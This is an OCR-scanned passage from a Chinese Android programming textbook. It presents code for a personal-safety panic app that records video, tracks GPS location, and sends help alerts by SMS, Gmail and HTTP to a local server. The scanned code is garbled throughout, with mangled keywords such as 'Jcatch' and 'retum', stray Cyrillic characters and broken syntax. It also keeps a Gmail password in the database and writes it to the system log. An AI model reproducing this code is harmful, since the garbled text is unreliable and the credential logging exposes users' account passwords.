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}catch(SQLiteException e)( 
/database doesn't exist yet 


} 
if(checkDB != null) 
checkDB.close(); 


} 

else{ 
checkDB = this.getReadableDatabase(); 
checkDB.close(); 

} 


return checkDB != null ? true : false; 


} 


public void close() { 
IIthis closes the database. You would have to do this every time you finish using it as it will speed ир 
the runtime of the application. 
if(myDatabase != null) 
myDatabase.close(); 
super.close(); 


@Override 

public void onCreate(SQLiteDatabase db) { 
db.execSQL(createTable); 
db.execSQL(createTableContacts); 
db.execSQL(createTableAudio); 
db.execSQL(createTableEmail); 


public void onUpgrade(SQLiteDatabase db, int old Version, int newVersion) ( 


) 
public void createTables() ( 
try { 
myDatabase = getWritableDatabase(); 
Jcatch(Exception e){ 
} 


myDatabase = SQLiteDatabase.openDatabase(myPath, null, 
SQLiteDatabase.CREATE IF NECESSARY); 
try{ 
myDatabase.execSQL(createTable); 
}catch(SQLException sql)X 


e 
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H 
try( 

myDatabase.execSQL(createTableContacts); 
Jeatch(SQLException sql) 


H 
try{ 

myDatabase.execSQL(createTableAudio); 
}eatch(SQLException sql)( 


H 


try 
myDatabase.execSQL (createTableEmail); 


Jcatch(SQLException sql){ 


H 
myDatabase.close(); 


} 


public boolean checkdetails(Context c) { 
myDatabase = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE_ 
IF_NECESSARY); 
Cursor cursor = myDatabase.rawQuery("SELECT firstName FROM user;", null); 


if(cursor.getCount()>0){ 
cursor.moveToFirst(); 
myDatabase.close(); 
cursor.close(); 

return true; 

} 

else{ 
myDatabase.close(); 
cursor.close(); 
return false; 

) 


) 


public Cursor getNumbers() ( 
myDatabase = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE_ 
IF_NECESSARY); 
Cursor cursor = myDatabase.rawQuery("SELECT * FROM contacts", null); 
cursor.getCount(); 
myDatabase.close(); 
return cursor; 


} 


public boolean checkPin(String pin, Context context) { 
myDatabase = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE_ 
IF_NECESSARY); 
boolean match = false; 
Cursor cursor = myDatabase.rawQuery("SELECT securityPin FROM user;", null); 
if(cursor.getCount()>0){ 
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cursormoveToFirst(); 
if(cursor.getString(cursor.getColumnIndex("securityPin")).equals (pin))( 
match - true; 

H 

} 

cursor.close(); 

myDatabase.close(); 

return match; 

} 


public void addLocation(String location) ( 
myDatabase = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE ` 
IF NECESSARY); 
ContentValues value = new ContentValues(); 
value.put("location", location); 
myDatabase.update("user", value, "ID" + "=" + 1, null); 
myDatabase.close(); 
b 
public String getLocation() ( 
myDatabase = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE ` 
IF NECESSARY); 
Cursor cursor = myDatabase.rawQuery(" SELECT * FROM user;", null); 
cursor.moveToFirst(); 
String location = cursor.getString(cursor.getColumnIndex("location")); 
cursor.close(); 
myDatabase.close(); 
return location; 


$ 


public String[ ] getPersonalDetails()( 
String[ ] values = new String[3]; 
myDatabase = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE_ 
IF NECESSARY); 

Cursor cursor = myDatabase.rawQuery("SELECT * FROM user;", null); 

if(cursor!=null){ 
cursor.moveToFirst(); 
values [0] = cursor.getString(cursor.getColumnIndex("firstName")); 
values [1] = cursor.getString(cursor.getColumnIndex("secondName")); 
values [2] = cursor.getString(cursor.getColumnIndex("address")); 

} 

myDatabase.close(); 

return values; 


} 


public void updateTableUser(ContentValues args){ 
myDatabase = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE_ 
IF_NECESSARY); 
myDatabase.update("user", args, "ID ="+1, null); 
args.clear(); 
myDatabase.close(); 
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public void updateTableContacts(ContentValues args){ 


myDatabase = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE ` 


IF NECESSARY); 


} 


myDatabase.insert("contacts" , "" , args); 
args.clear(); 
myDatabase.close(); 


public Cursor getContacts(Context cX 


myDatabase = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE _ 


IF NECESSARY); 


) 


Cursor contacts = myDatabase.rawQuery(" SELECT name FROM contacts;", null); 
contacts.getCount(); 

myDatabase.close(); 

return contacts; 


public void deleteContact(String value){ 


myDatabase = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE _ 


IF. NECESSARY); 


} 


myDatabase.delete("contacts", "пате=?", new String[ ]{value}); 
myDatabase.close(); 


public void addWordActivation(String value)( 


myDatabase = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE ` 


IF NECESSARY); 


) 


ContentValues args = new ContentValues(); 
args.put("wordActivation", value); 
args.put("wordActivationOn", "OFF"); 
args.put("decibelOn", "OFF"); 

args.put("ID", 1); 
myDatabase.insert("audio","", args); 
args.clear(); 

myDatabase.close(); 


public void updateWordActivation(String value){ 


myDatabase = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE_ 


IF_NECESSARY); 


} 


ContentValues args = new ContentValues(); 
args.put("wordActivation", value); 
myDatabase.update("audio", args, "ID ="+1, null); 
args.clear(); 

myDatabase.close(); 


public String getActivationWord(){ 


myDatabase = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE_ 


IF_NECESSARY); 
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Cursor activationWord = myDatabase.rawQuery("SELECT * FROM audio;", null); 
activationWord.moveToFirst(); 

String value = activationWord.getString(activationWord.getColumnIndex("wordActivation")); 
activationWord.close(); 

myDatabase.close(); 

return value; 


} 


public String getActivationState()( 
myDatabase = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE_ 
IF_NECESSARY); 
Cursor activationWord = myDatabase.rawQuery("SELECT * FROM audio;", null); 
activationWord.moveToFirst(); 
String value = activationWord.getString(activationWord.getColumnIndex("wordActivationOn")); 
activationWord.close(); 
myDatabase.close(); 
return value; 
È 
public void setActivationWordState(String value 
myDatabase = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE ` 
IF NECESSARY); 
ContentValues args = new ContentValues(); 
args.put("wordActivationOn", value); 
myDatabase.update("audio", args, "ID ="+1, null); 
args.clear(); 
myDatabase.close(); 
} 
public String getDecibelState(){ 
myDatabase = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE_ 
IF_NECESSARY); 
Cursor activationWord = myDatabase.rawQuery("SELECT * FROM audio;", null); 
activationWord.moveToFirst(); 
String value = activationWord.getString(activationWord.getColumnindex("decibelOn")); 
activationWord.close(); 
myDatabase.close(); 
return value; 
} 
public void setDecibelState(String value)( 
myDatabase = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE_ 
IF_NECESSARY); 
ContentValues args = new ContentValues(); 
args.put("decibelOn", value); 
myDatabase.update("audio", args, "ID ="+1, null); 
args.clear(); 
myDatabase.close(); 
} 
public Cursor getContacts(){ 
myDatabase = SQLiteDatabase.openDatabase(myPath, null, SQLiteDatabase.CREATE_ 
IF_NECESSARY); 
Cursor args = myDatabase.rawQuery("SELECT * FROM contacts;", null); 
myDatabase.close(); 
@ 
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return args; 

H 

protected void onStop(){ 
super.close(); 

} 


22.5 动画 提示 界面 


GF 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 22 章 \ 动 画 提 示 界 面 .avi 
当 用 户 设置 完 系统 信息 后 ， 系 统 将 来 到 动画 提示 界面 ， 单 击 Next 按钮 后 将 以 动画 效果 展示 系统 的 使 用 
说 明 ， 如 图 22-7 所 示 。 


EO кам 


图 22-7 动画 提示 界面 
由 此 可 见 ， 动 画 提示 界面 是 一 个 使 用 帮助 界面 。 在 本 节 的 内 容 中 ， 将 详细 讲解 动画 提示 界面 的 具体 实 
现 流程 。 


22.5.1 实现 界面 U! 布局 


动画 提示 界面 UI 布局 的 实现 文件 是 animation.xml， 功 能 是 载 入 显示 预制 的 动画 素材 和 Next 按钮 ， 具 
体 实现 代码 如 下 所 示 。 
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" 
android:id="@+id/linearLayout" 
android:orientation-"vertical" 
android:layout width-"match parent" 
android:layout height-"match parent" 


<ImageView 

android:id="@+id/tutriol" 
android:paddingLeft="50px" 
android:paddingRight="50px" 
android:layout_width="match_parent" 
android:layout_height="200px" 
android:gravity="center"> 

</ImageView> 

<ScrollView 
android:id="@+id/scroll1" 
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android:orientation="vertical" 
android:layout width-"match parent" 
android:layout height-"match parent" 


«LinearLayout 
android:id="@+id/tutLayout" 
android:orientation="vertical" 
android:layout_width="match_parent" 
android:layout_height="match_parent"> 


<TextView 
android:id="@+id/tutText" 
android:layout_width="fill_ parent" 
android:layout_height="wrap_content"/> 
<LinearLayout 
android:orientation="horizontal" 
android:layout_width="match_parent" 
android:layout_height="match_parent" 
> 
<Button 
android:id="@+id/next" 
android:layout_width="100px" 
android:layout_height="wrap_content" 
android:text= "Next" 
android:textSize="20px" 
android:gravity="left"/> 
<Button 
android:id="@+id/back" 
android:layout_width="100px" 
android:layout height-"wrap content" 
android:visibility="invisible" 
android:textSize="20px" 
android:text= "Back" 
android:gravity="right"/> 
</LinearLayout> 
</LinearLayout> 
</ScrollView> 
</LinearLayout> 


22.5.2 显示 不 同 的 动画 提示 信息 


文件 AnimationActivity.java 的 功能 是 , 监听 用 户 在 动画 提示 界面 单 击 Next 按钮 , 根据 单 击 操作 使 用 case 
语句 显示 不 同 的 界面 提示 信息 。 文 件 AnimationActivity.java 的 具体 实现 代码 如 下 所 示 。 

public class AnimationActivity extends Activity ( 

/** Called when the activity is first created */ 

private AnimationDrawable rocketAnimation; 

private TextView text; 

private ImageView rocketlmage; 

private Button next; 

private ScrollView scroll; 


@ 
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private Button back; 
private View lay; 
private int index = 1; 


public void onCreate(Bundle savedInstanceState) { 
super.onCreate(savedInstanceState); 
setContentView(R.layout.animation); 
back = (Button) findViewByld(R.id.back); 
scroll = (ScrollView) findViewByld(R.id.scroll1); 
next = (Button) findViewByld(R.id.next); 
lay = (View) findViewByld(R.id.tutLayout); 
rocketlmage = (ImageView) findViewByld(R.id.tutriol); 
text = (TextView) findViewByld(R.id.tutText); 
lay.setBackgroundColor(Color.WHITE); 
rocketlmage.setBackgroundResource(R.drawable.animation1); 
rocketAnimation = (AnimationDrawable) rocketImage.getBackground(); 
text.setText("When you want to activate the Attack app, press the panic button."); 
text.setTextSize(20); 
text.setTextColor(Color.BLACK); 
back.setOnClickListener(new OnClickListener(X 


public void onClick(View arg0) ( 
index = index-2; 
next.performClick(); 


}; 
next.setOnClickListener(new OnClickListener()( 


public void onClick(View argO) ( 

index++; 

switch(index){ 

case 1: 
scroll.scrollTo(0, 0); 
rocketImage.setBackgroundResource(R.drawable.animation1); 
rocketAnimation = (AnimationDrawable) rocketlmage.getBackground(); 
back.setVisibility(View.INVISIBLE); 
text.setText("When you want to activate the Attack app, press the panic button."); 
onWindowFocusChanged (true); 
break; 

case 2: 
scroll.scrollTo(0, 0); 
rocketlmage.setBackgroundResource(R.drawable.animation2); 
rocketAnimation = (AnimationDrawable) rocketlmage.getBackground(); 
back.setVisibility(View. VISIBLE); 
text.setText("When it is in active state, you can deativate the app by pressing " + 

"the deactivate button. You then enter your 4 pin code and press ok to 
deactivate it. You only have 10 seconds to do so"); 

onWindowFocusChanged (true); 
break; 

case 3: 
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Scroll.scrollTo(0, 0); 
rocketlmage.setBackgroundResource(R.drawable.animation3); 
rocketAnimation = (AnimationDrawable) rocketlmage.getBackground(); 
text.setText("Click settings to change App operation. click on contacts and add new contact. 
This will be the person you will send the " + 
"information to. You can add as many contacts as you want. you can delete a 
contact by holding the button of their name"); 
onWindowFocusChanged (true); 
break; 
case 4: 
scroll.scrollTo(0, 0); 
rocketlmage.setBackgroundResource(R.drawable.animation6); 
rocketAnimation = (AnimationDrawable) rocketlmage.getBackground(); 
text.setText("When you first click the Email contacts button, you will be asked to enter in 
your Gmail address and "+ 
"the password to access that Gmail account in emergency. when you fill in the 
form you can then add " * 
"Email contacts like you did with phone contacts."); 
next.setText("Next"); 
onWindowFocusChanged (true); 
break; 
case 5: 
scroll.scrollTo(0, 0); 
rocketlmage.setBackgroundResource(R.drawable.animation4); 
rocketAnimation = (AnimationDrawable) rocketlmage.getBackground(); 
text.setText("when you click word activation, you can set the word you want to activate the app." + 
"press save when you typed it in. if you want to turn the word activation on, click 
it on at the bottom. " + 
"you can also activate a decibel system where it will go off when it reaches a 
certain noise level."); 
next.setText("Next"); 
onWindowFocusChanged (true); 
break; 
case 6: 
scroll.scrollTo(0, 0); 
rocketlmage.setBackgroundResource(R.drawable.animation5); 
rocketAnimation = (AnimationDrawable) rocketlmage.getBackground(); 
next.setText("Finish"); 
text.setText("Click change password to change your old password to a new one. click 
change details if" + 
" you want to change personal information"); 
onWindowFocusChanged (true); 
break; 
case 7: 
Intent loadPage = new Intent(getApplicationContext(), LoadPage.class); 
startActivity(loadPage); 
AnimationActivity.this.finish(); 
break; 


D» 
} 


@Override 
public void onWindowFocusChanged (boolean hasFocus) 
{ 
rocketAnimation.start(); 
} 


226 激活 定位 跟踪 功能 


Фи 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 22 章 \ 激 活 定位 跟踪 功能 .avi 
在 动画 提示 界面 中 一 直 单 击 Next 按钮 ， 最 后 来 到 激活 定位 跟踪 界面 ， 如 图 22-8 所 示 。 


图 22-8 激活 定位 跟踪 界面 


当 单 击 图 22-8 中 的 Panic Button 按钮 后 会 激活 定位 跟踪 功能 , 单 击 下 方 的 Settings 按钮 会 来 到 系统 设置 
界面 。 在 本 节 的 内 容 中 ， 将 详细 讲解 激活 定位 跟踪 界面 的 具体 实现 流程 。 


22.6.1 实现 U 界面 布局 


激活 定位 跟踪 界面 的 UI 布局 文件 是 surface_view.xml， 功 能 是 显示 一 个 激活 图 标 按 钮 和 一 个 Settings 按 
钮 ， 具 体 实现 代码 如 下 所 示 。 
<?xml version="1.0" encoding="utf-8"?> 
<RelativeLayout 
xmlns:android="http://schemas.android.com/apk/res/android" 
android:orientation="vertical" 
android:layout_width="match_parent" 
android:layout_height="match_parent"> 
«SurfaceView android:id="@+id/surface_camera" 
android:layout_width="fill_parent" 
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android:layout_height="fill_ parent" 
android:layout centerlnParent="true"> 
</SurfaceView> 
<Button 
android:id="@+id/activate" 
android:layout_width="fill_ parent" 
android:layout_height="fill_ parent" 
android:padding="50px" 
android:layout_marginBottom="50px" 
android:background="@drawable/custom_button" /> 


<Button 
android:id="@+id/deactivate" 
android:layout_width="fill_ parent" 
android:layout_height="fill_ parent" 
android:padding="10dp" 
android:visibility="invisible" 
android:background="@drawable/deactivate_custom_button" /> 


<Button 
android:id="@+id/settings" 
android:layout widthz"fill parent" 
android:layout_height="50px" 
android:layout_alignParentBottom="true" 
android:text="@string/settings" /> 

<TextView 
android:id="@+id/timer" 
android:layout_width="fill_ parent" 
android:layout_height="50px" 
android:textSize="20px" 
android:layout_alignParentBottom="true" 
android:text="" 
android:visibility="invisible"/> 

</RelativeLayout> 


22.6.2 ”实现 定位 跟踪 


文件 CameraView java 的 功能 是 加 载 激活 定位 跟踪 界面 的 UI 布局 控件 ， 监 听 用 户 在 界面 中 对 按钮 的 单 
击 操作 ， 并 根据 单 击 操作 执行 对 应 的 事件 处 理 程序 。 文 件 CameraView java 的 具体 实现 代码 如 下 所 示 。 

public class CameraView extends Activity implements SurfaceHolder.Callback( 

private MediaRecorder recorder; 

private LocationManager locManager; 

private LocationListener locListener; 

private SurfaceHolder holder; 

public static Button activate; 

private boolean recording = false; 

private boolean match; 

private static Context context; 

private DeactivateDialog dialog; 

private int videoNum; 
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private int timerNum = 0; 

private Intent sms; 

public VoiceRecognition voice; 

private Database db = new Database(this); 


public void onCreate(Bundle savedinstanceState) { 
super.onCreate(savedInstanceState); 


requestWindowFeature(Window.FEATURE NO TITLE); 
getWindow().setFlags(WindowManager.LayoutParams.FLAG FULLSCREEN, 
WindowManager.LayoutParams.FLAG FULLSCREEN); 
getWindow().addFlags(WindowManager.LayoutParams.FLAG KEEP SCREEN ON); 
setRequestedOrientation(ActivityInfo.SCREEN ORIENTATION PORTRAIT); 


recorder = new MediaRecorder(); 
if(getintent() != null) { 
Bundle extras = getintent().getExtras(); 
videoNum = extras !- null ? extras.getint("value") : 0; 


IRA UI 布局 视图 控件 
setContentView(R.layout.surface view); 


SurfaceView cameraView = (SurfaceView) find ViewByld(R.id.surface camera); 
holder = cameraView.getHolder(); 

holder.addCallback(this); 
holder.setType(SurfaceHolder.SURFACE_TYPE_PUSH_BUFFERS); 
recorder.setPreviewDisplay(holder.getSurface()); 

context = this; 

dialog = new DeactivateDialog(context); 

onClick(); 

checkGPS(); 

createGpsintent(); 

resetVoiceRecognition(); 


private void checkGPS() ( 
LocationManager locMan = (LocationManager) getSystemService(LOCATION SERVICE); 
boolean gpsEnabled = locMan.isProviderEnabled(LocationManager.GPS PROVIDER); 
if(IgpsEnabled)( 
createDialog(); 
) 


public void createDialog()( 
AlertDialog.Builder alert = new AlertDialog.Builder(this ); 
alert.setTitle(R.string.gps message); 
alert.setPositiveButton(R.string.gps settings, new DialogInterface.OnClickListener() { 


_@) 
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public void onClick(DialogInterface dialog, int which) { 
startActivityForResult(new Intent(android.provider.Settings. ACTION LOCATION - 
SOURCE SETTINGS), 0); 
return; 
} 
» 


alert.setNegativeButton("Cancel", new DialogInterface.OnClickListener() ( 


public void onClick(DialogInterface dialog, int which) ( 
retum; 
} 
D» 
alert.create(); 
alert.show(); 


private void initRecorder() ( 
recorder.reset(); 
recorder.setAudioSource(MediaRecorder.AudioSource.DEFAULT); 
recorder.setVideoSource(MediaRecorder.VideoSource.DEFAULT); 


CamcorderProfile cpHigh = CamcorderProfile 
.get(CamcorderProfile. QUALITY HIGH); 

recorder.setProfile(cpHigh); 

recorder.setOutputFile("/sdcard/videocapture example"*videoNum*".mp4"); 

recorder.setMaxDuration(8000); 


recorder.setMaxFileSize(5000000); // Approximately 5 megabytes 
try { 

recorder.prepare(); 
) catch (IOException e) { 

e.printStackTrace(); 

finish(); 


private void onClick() { 
activate = (Button) findViewByld(R.id.activate); 
final Button deactivate = (Button) findViewByld(R.id.deactivate); 
final Button settings = (Button) findViewByld(R.id.settings); 
final TextView timer = (TextView) findViewByld(R.id.timer); 
activate.setOnClickListener(new OnClickListener() { 
public void onClick(View v) { 
activate.setVisibility(View.INVISIBLE); 
if(voice != null)( 
voice.recognizer.destroy(); 
voice = null; 


) 
deactivate.setVisibility(View. VISIBLE); 


timer.setVisibility(View. VISIBLE); 
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settings.setVisibility(View.INVISIBLE); 
checkRecording(); 
startAlert(); 
} 
» 


deactivate.setOnClickListener(new OnClickListener() { 
public void onClick(View v) { 
dialog.showDialog(); 
} 
}; 


settings.setOnClickListener(new OnClickListener() ( 
public void onClick(View v) ( 

locManager.removeUpdates(locListener); 
if(voice != null){ 

voice.recognizer.destroy(); 

voice = null; 
} 
Intent settings = new Intent(getBaseContext(), Settings.class); 
settings.putExtra("value", videoNum); 
onDestroy(); 
startActivity(settings); 


bh» 
} 


private void startAlert() { 
final Button activate = (Button) findViewByld(R.id.activate); 
final Button deactivate = (Button) findViewByld(R.id.deactivate); 
final Button settings = (Button) findViewByld(R.id.settings); 
final TextView timer = (TextView) findViewByld(R.id.timer); 
CountDownTimer start = new CountDownTimer(10000, 1000){ 


@Override 
public void onTick(long miliseconds){ 
if(miliseconds/1000 >= 0 && dialog.check()!=true){ 
String val = getResources().getString(R.string.seconds_remaining); 
timer.setText(val +(miliseconds/1000)); 
} 
if(dialog.check()==true){ 
timer.setText(R.string.send has been deactivated); 
) 
match = dialog.check(); 
if(match == true&&timerNum==0){ 


checkRecording(); 
Toast.makeText(getApplicationContext(), R.string.information_not_sent_, 5000).show(); 
} 
} 
@Override 
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public void onFinish()( 
final String loc = db.getLocation(); 
final String[ ] personallnfo = db.getPersonalDetails(); 
final Cursor contacts = db.getContacts(); 


if(match == false) 
resetVoiceRecognition(); 
sendSms(loc); 
checkRecording(); 
if(db.hasGmail()){ 
Thread s = new Thread(new Runnable(){ 


public void run() { 
String args[ ] = db.getGmail(); 
GmailSender sender = new GmailSender(args[0], args[1]); 


Cursor c = db.getEmailContacts(); 
while(c.moveToNext())( 
try { 


Log.e(args[0], args[1]); 
sender.sendMail(loc, args[0], c.getString(c.get- 
Columnindex("emailAddress"))); 


) catch (Exception e) ( 
Log.e("SendMail", e.getMessage(), e); 
} 
} 
} 
» 
s.start(); 
b 
Toast.makeText(getApplicationContext(), "Information sent", 5000).show(); 
) 
) 
}.start(); 


} 


public void resetVoiceRecognition()( 
if(db.getActivationState().equals("ON")){ 
Log.e("is", "Is on"); 
voice = new VoiceRecognition(context); 


} 


public boolean onKeyDown(int keyCode, KeyEvent event) { 
if (KeyCode == KeyEvent.KEYCODE BACK ||keyCode == KeyEvent.KEYCODE HOME) ( 
Button activate = (Button) findViewByld(R.id.activate); 
if(activate.getVisibility() == View.VISIBLE)( 


e. 
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moveTaskToBack(true); 
onDestroy(); 
return true; 
} 
retum true; 
} 


return super.onKeyDown(keyCode, event); 


) 


private void sendSms(String location)( 
sms - new Intent(this, SMS.class); 
sms.putExtra("location", location); 

this.startService(sms); 


) 


private void createGpsintent() { 
String | = db.getLocation(); 
if(l == null) 
db.addLocation("No Value"); 
} 
locManager = (LocationManager)getS ystemService(Context.LOCATION SERVICE); 
Criteria criteria = new Criteria(); 
String provider = locManager.getBestProvider(criteria, false); 
locManager.getLastKnownLocation(provider); 
locListener = new MyLocationListener(this); 
locManager.requestLocationUpdates( LocationManager.GPS_PROVIDER, 1000, 2, locListener); 


public void surfaceChanged(SurfaceHolder holder, int format, int width, 


int height) { 
} 
public void checkRecording() { 
if (recording) { 
recorder.stop(); 
recording = false; 


videoNum = videoNum+1; 

timerNum = timerNum+1; 
// Let's initRecorder so we can record again 

11 initRecorder(); 
Intent camera = new Intent(this, CameraView.class); 
camera.putExtra("value", videoNum); 
super.finish(); 
startActivity(camera); 
) else { 

initRecorder(); 
recording = true; 
recorder.start(); 
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} 
} 


public void surfaceCreated(SurfaceHolder holder) { 


} 


public void surfaceDestroyed(SurfaceHolder holder) { 
if (recording) { 
recorder.stop(); 
recording = false; 
È 
recorder.release(); 
finish(); 
} 


public void onDestroy(){ 

super.onDestroy(); 

try{ 
this.stopService(sms); 

Jcatch(Exception e)( ) 

try( 
voice.recognizer.destroy(); 

Jcatch(Exception e)( ) 

if(locManager != null)( 
locManager.removeUpdates(locListener); 


} 
} 


} 
上 述 实 现代 码 的 功能 比较 强大 ， 不 但 监听 了 用 户 的 操作 事件 ， 而 且 实 现 了 摄像 头 视 频 录制 、 发 送 求救 


短信 、 发 送 求救 邮件 、 实 现 GPS 定位 、 构 建 GPS 定位 地 图 等 功能 。 


226.3 ”发 送 求救 邮件 


文件 GmailSender.java 的 功能 是 ， 当 用 户 激活 定位 跟踪 功能 后 ， 通 过 Gmail 邮箱 向 设置 的 联系 人 邮箱 发 
送 求救 邮件 ， 在 邮件 中 包含 了 录制 的 5 秒 钟 视频 。 文 件 GmailSender java 的 具体 实现 代码 如 下 所 示 。 


public class GmailSender extends javax.mail.Authenticator ( 
private String mailhost = "smtp.gmail.com"; 
private String user; 
private String password; 
private Session session; 
private Multipart multipart = new MimeMultipart(); 


static { 
Security.addProvider(new JSSEProvider()); 
} 


public GmailSender(String address, String password) ( 
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this.user = address; 
this.password = password; 


Properties props = new Properties(); 
props.setProperty("mail.transport.protocol", "smtp"); 
props.setProperty("mail.host", mailhost); 
props.put("mail.smtp.auth", "true"); 
props.put("mail.smtp.port", "465"); 
props.put("mail.smtp.socketFactory.port", "465"); 
props.put("mail.smtp.socketFactory.class", 
"javax.net.ssl.SSLSocketFactory"); 
props.put("mail.smtp.socketFactory.fallback", "false"); 
props.setProperty ("mail.smtp.quitwait", "false"); 


session = Session.getDefaultInstance(props, this); 
} 


protected PasswordAuthentication getPasswordAuthentication() { 
return new PasswordAuthentication(user, password); 


} 


public synchronized void sendMail(String loc, String sender, String recipients) throws Exception { 
try{ 
MimeMessage message = new MimeMessage(session); 
loc = loc.replace(" ", ""); 
String mes = "This person needs your help. They are at: "+"http://maps.google.com/?q="+loc; 
DataHandler handler = new DataHandler(new ByteArrayDataSource(mes.getBytes(), "text/plain")); 
message.setSender(new InternetAddress(sender)); 
message.setSubject("Help alert!"); 
message.setDataHandler(handler); 
addAttachment(mes); 
message.setContent( multipart); 
if (recipients.indexOf(',) > 0) 
message.setRecipients(Message.RecipientType.TO, InternetAddress.parse(recipients)); 
else 
message.setRecipient(Message.RecipientType.TO, new InternetAddress(recipients)); 
Transport.send(message); 
}eatch(Exception e){ 


} 
} 


public void addAttachment(String message) throws Exception { 
BodyPart messageBodyPart = new MimeBodyPart(); 
DataSource source = new FileDataSource(Environment.getExternalStorageDirectory() + 
"+ File.separatorChar + "videocapture example0.mp4"); 
messageBodyPart.setDataHandler(new DataHandler(source)); 
messageBodyPart.setFileName("video.mp4"); 
_multipart.addBodyPart(messageBodyPart); 


BodyPart messageBodyPart2 = new MimeBodyPart(); 


Android 系统 安全 和 反 编译 实 点 


messageBodyPart2.setText(message); 


_multipart.addBodyPart(messageBodyPart2); 

} 

public class ByteArrayDataSource implements DataSource { 
private byte[ ] data; 
private String type; 


public ByteArrayDataSource(byte[ ] data, String type) { 


super(); 
this.data = data; 
this.type = type; 
} 
public ByteArrayDataSource(byte[ ] data) { 
super(); 
this.data = data; 
} 
public void setType(String type){ 
this.type = type; 
} 
public String getContentType() ( 
if (type == null) 
return "application/octet-stream"; 
else 
return type; 


) 


public InputStream getlnputStream() throws IOException ( 
return new ByteArraylnputStream(data); 
} 


public String getName() { 
return "ByteArrayDataSource"; 
} 


public OutputStream getOutputStream() throws IOException { 
throw new IOException("Not Supported"); 
} 


} 
22.6.4 ”位置 监 


文件 MyLocationListener 的 功能 是 ， 当 用 户 激 活 定位 跟踪 功能 后 ， 通 过 LocationListener 对 象 监听 当前 
的 位 置 。 文 件 MyLocationListener 的 具体 实现 代码 如 下 所 示 。 
public class MyLocationListener implements LocationListener( 


private Context context; 
e. 
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private Database database; 


public MyLocationListener(Context cntext)( 
this.context = cntext; 
database = new Database(context); 

H 

public void onLocationChanged(Location loc){ 
String text = loc.getLatitude()+", " + loc.getLongitude(); 
Toast.makeText(context, text, Toast.LENGTH SHORT).show(); 
database.addLocation(text); 
Log.e("location", text); 

} 

public void onProviderDisabled(String provider) 


1 
Toast.makeText( context, "Gps Disabled", Toast.LENGTH SHORT ).show(); 


} 
public void onProviderEnabled(String provider) 


{ 


Toast.makeText(context, "Gps Enabled", Toast.LENGTH_SHORT).show(); 
} 


22.6.5 ”发 送 求救 短信 


文件 SMS java 的 功能 是 ， 当 用 户 激活 定位 跟踪 功能 后 ， 向 设置 的 联系 人 的 电话 发 送 求救 短信 ， 在 短信 
中 包含 了 当前 的 定位 信息 。 文 件 SMS.java 的 具体 实现 代码 如 下 所 示 。 
public class SMS extends Service{ 
private String location; 
@Override 
public IBinder onBind(Intent arg0) ( 
return null; 


) 


@Override 
public void onStart(Intent intent, int startid) { 
super.onStart(intent, startid); 
Bundle getvars = intent.getExtras(); 
if(getvars != null) { 
location = getvars.getString("location"); 
} 
char[ ] array = location.toCharArray(); 
location = location.replaceAll(" ", ""); 
String loc = "http://maps.google.com/?q="+location; 
Log.e("message", location); 
sendSMS(getString(R.string.this person needs your help they are at )+loc); 


) 


private void sendSMS(String message) 
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í 
Database db = new Database(this); 


Cursor cursor = db.getNumbers(); 

db.onStop(); 

Log.e("message", message); 

if(cursor!=null){ 

while(cursor.move ToNext()){ 

String phoneNumber = cursor.getString(cursor.getColumnIndex("number")); 
Log.e("number", phoneNumber); 
SmsManager sms = SmsManager.getDefault(); 
sms.sendTextMessage(phoneNumber, null, message, null, null); 


) 
22.6.6 发送 信息 到 服务 器 网 站 


文件 sendDataToWebService.java 的 功能 是 ， 当 用 户 激 活 定位 跟踪 功能 后 ， 向 指定 的 远程 服务 器 网 站 发 
送 求 救 信息 ， 包 含 了 5 秒 钟 视频 和 定位 信息 。 文 件 sndDataToWebServicejava 的 具体 实现 代码 如 下 所 示 。 

public class sendDataToWebService( 

public static final String LoginServiceUri = "http://192.168.43.119:8080/ping"; 

private static HttpClient mHttpClient; 

private String location; 

private String firstName; 

private String secondName; 

private String address; 

private static Context context; 

private int videoNum; 


public sendDataToWebService(Context contxt, String loc, String[ ] personallnfo, Cursor contacts, int num) ( 
location = loc; 
context = contxt; 
firstName = personallnfo[0]; 
secondName = personallnfo[1]; 
address = personallnfo[2]; 
videoNum = num - 1; 
send(); 
H 


public void send() ( 
String path = Environment.getExternalStorageDirectory() + 
"" + File.separatorChar + "videocapture_example"+videoNum+".mp4"; 


File f = new File(path); 
byte[ ] filebyte = null; 


ty{ 
filebyte = FileUtils.readFileToByteArray(f); 
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) catch (IOException e) ( 
И TODO Auto-generated catch block 
e.printStackTrace(); 


String decode = Base64.encodeToString(filebyte, Context. MODE APPEND); 
ArrayList<NameValuePair> nameValuePairs = new ArrayList<NameValuePair>(); 


nameValuePairs.add(new BasicNameValuePair("Videofile", decode)); 
nameValuePairs.add(new BasicNameValuePair("location", location)); 
nameValuePairs.add(new BasicNameValuePair("firstName", firstName)); 
nameValuePairs.add(new BasicNameValuePair("secondName", secondName)); 
nameValuePairs.add(new BasicNameValuePair("address", address)); 
try { 

executeHttpPost(LoginServiceUri, nameValuePairs); 

} catch (Exception e) { 
I| TODO Auto-generated catch block 
e.printStackTrace(); 


Dr static void executeHttpPost(String ип, ArrayListzNameValuePair» postParameters) throws Exception { 
BufferedReader in = null; 
try{ 
HttpClient client = getHttpClient(); 
HttpPost request = new HttpPost(url); 
